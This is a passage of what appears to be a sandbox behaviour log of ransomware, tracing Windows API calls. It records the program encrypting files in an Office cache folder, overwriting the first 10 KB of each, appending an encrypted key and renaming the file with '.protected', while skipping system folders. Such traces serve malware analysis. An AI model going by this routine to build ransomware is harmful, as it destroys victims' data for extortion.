lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.protected")) returned 1 [0059.426] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.426] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="Windows") returned -1 [0059.426] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="Program Files") returned -1 [0059.426] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="Program Files (x86)") returned -1 [0059.426] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="$Recycle.bin") returned 1 [0059.426] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="System Volume Information") returned -1 [0059.426] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0059.426] StrStrIW (lpFirst="OfficeMUI.msi", lpSrch=".protected") returned 0x0 [0059.426] lstrcmpW (lpString1="OfficeMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0059.426] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.426] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.426] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.426] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 
[0059.426] StrStrW (lpFirst="OfficeMUI.msi", lpSrch=".txt") returned 0x0 [0059.426] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0059.426] StrStrW (lpFirst="OfficeMUI.msi", lpSrch=".rar") returned 0x0 [0059.426] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0059.426] StrStrW (lpFirst="OfficeMUI.msi", lpSrch=".zip") returned 0x0 [0059.426] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.437] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.437] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.437] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.437] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.446] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.446] CloseHandle (hObject=0xb4) returned 1 [0059.447] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.protected") returned 90 [0059.447] 
MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.protected")) returned 1 [0059.447] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.447] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="Windows") returned -1 [0059.447] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="Program Files") returned -1 [0059.447] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="Program Files (x86)") returned -1 [0059.447] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="$Recycle.bin") returned 1 [0059.447] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="System Volume Information") returned -1 [0059.447] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0059.447] StrStrIW (lpFirst="OfficeMUI.xml", lpSrch=".protected") returned 0x0 [0059.447] lstrcmpW (lpString1="OfficeMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0059.447] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.447] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.447] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.448] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0059.448] StrStrW (lpFirst="OfficeMUI.xml", lpSrch=".txt") returned 0x0 [0059.448] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0059.448] StrStrW (lpFirst="OfficeMUI.xml", lpSrch=".rar") returned 0x0 [0059.448] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0059.448] StrStrW (lpFirst="OfficeMUI.xml", lpSrch=".zip") returned 0x0 [0059.448] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x15b5, lpOverlapped=0x0) returned 1 [0059.461] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffea4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.461] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x15b5, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x15b5, lpOverlapped=0x0) returned 1 [0059.461] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.461] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.461] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.461] CloseHandle (hObject=0xb4) returned 1 
[0059.461] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.protected") returned 90 [0059.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.protected")) returned 1 [0059.462] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.462] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="Windows") returned -1 [0059.462] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="Program Files") returned -1 [0059.462] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="Program Files (x86)") returned -1 [0059.462] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="$Recycle.bin") returned 1 [0059.462] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="System Volume Information") returned -1 [0059.462] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0059.462] StrStrIW (lpFirst="OfficeMUISet.msi", lpSrch=".protected") returned 0x0 [0059.462] lstrcmpW (lpString1="OfficeMUISet.msi", lpString2="RESTORE_FILES.txt") returned -1 [0059.462] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.462] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.462] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.462] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0059.462] StrStrW (lpFirst="OfficeMUISet.msi", lpSrch=".txt") returned 0x0 [0059.462] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0059.462] StrStrW (lpFirst="OfficeMUISet.msi", lpSrch=".rar") returned 0x0 [0059.462] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0059.462] StrStrW (lpFirst="OfficeMUISet.msi", lpSrch=".zip") returned 0x0 [0059.462] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.467] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.467] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.467] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.467] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.468] WriteFile (in: 
hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.468] CloseHandle (hObject=0xb4) returned 1 [0059.476] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.protected") returned 93 [0059.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.protected")) returned 1 [0059.476] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.476] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="Windows") returned -1 [0059.476] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="Program Files") returned -1 [0059.476] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="Program Files (x86)") returned -1 [0059.476] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="$Recycle.bin") returned 1 [0059.476] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="System Volume Information") returned -1 [0059.476] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0059.476] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch=".protected") returned 0x0 [0059.476] lstrcmpW (lpString1="OfficeMUISet.xml", lpString2="RESTORE_FILES.txt") returned -1 [0059.476] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) 
returned 1 [0059.477] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.477] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.477] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0059.477] StrStrW (lpFirst="OfficeMUISet.xml", lpSrch=".txt") returned 0x0 [0059.477] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0059.477] StrStrW (lpFirst="OfficeMUISet.xml", lpSrch=".rar") returned 0x0 [0059.477] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0059.477] StrStrW (lpFirst="OfficeMUISet.xml", lpSrch=".zip") returned 0x0 [0059.477] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x333, lpOverlapped=0x0) returned 1 [0059.487] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.487] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x333, lpOverlapped=0x0) returned 1 [0059.487] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0059.487] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.487] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.487] CloseHandle (hObject=0xb4) returned 1 [0059.487] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.protected") returned 93 [0059.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.protected")) returned 1 [0059.488] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.488] lstrcmpiW (lpString1="osetupui.dll", lpString2="Windows") returned -1 [0059.488] lstrcmpiW (lpString1="osetupui.dll", lpString2="Program Files") returned -1 [0059.488] lstrcmpiW (lpString1="osetupui.dll", lpString2="Program Files (x86)") returned -1 [0059.488] lstrcmpiW (lpString1="osetupui.dll", lpString2="$Recycle.bin") returned 1 [0059.488] lstrcmpiW (lpString1="osetupui.dll", lpString2="System Volume Information") returned -1 [0059.488] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0059.488] StrStrIW 
(lpFirst="osetupui.dll", lpSrch=".protected") returned 0x0 [0059.488] lstrcmpW (lpString1="osetupui.dll", lpString2="RESTORE_FILES.txt") returned -1 [0059.488] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.488] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.488] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0059.488] StrStrW (lpFirst="osetupui.dll", lpSrch=".txt") returned 0x0 [0059.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0059.488] StrStrW (lpFirst="osetupui.dll", lpSrch=".rar") returned 0x0 [0059.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0059.488] StrStrW (lpFirst="osetupui.dll", lpSrch=".zip") returned 0x0 [0059.488] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.489] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.489] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.490] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.490] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.497] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.497] CloseHandle (hObject=0xb4) returned 1 [0059.497] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.protected") returned 89 [0059.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.protected")) returned 1 [0059.498] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.498] lstrcmpiW (lpString1="pss10r.chm", lpString2="Windows") returned -1 [0059.498] lstrcmpiW (lpString1="pss10r.chm", lpString2="Program Files") returned 1 [0059.498] lstrcmpiW (lpString1="pss10r.chm", lpString2="Program Files (x86)") returned 1 [0059.498] lstrcmpiW (lpString1="pss10r.chm", lpString2="$Recycle.bin") returned 1 [0059.498] lstrcmpiW (lpString1="pss10r.chm", lpString2="System Volume Information") returned -1 [0059.498] wnsprintfW (in: 
pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0059.498] StrStrIW (lpFirst="pss10r.chm", lpSrch=".protected") returned 0x0 [0059.498] lstrcmpW (lpString1="pss10r.chm", lpString2="RESTORE_FILES.txt") returned -1 [0059.498] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.498] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.498] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.498] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0059.498] StrStrW (lpFirst="pss10r.chm", lpSrch=".txt") returned 0x0 [0059.499] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0059.499] StrStrW (lpFirst="pss10r.chm", lpSrch=".rar") returned 0x0 [0059.499] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0059.499] StrStrW (lpFirst="pss10r.chm", lpSrch=".zip") returned 0x0 [0059.499] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.528] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0059.528] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.528] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.528] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.622] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.623] CloseHandle (hObject=0xb4) returned 1 [0059.623] 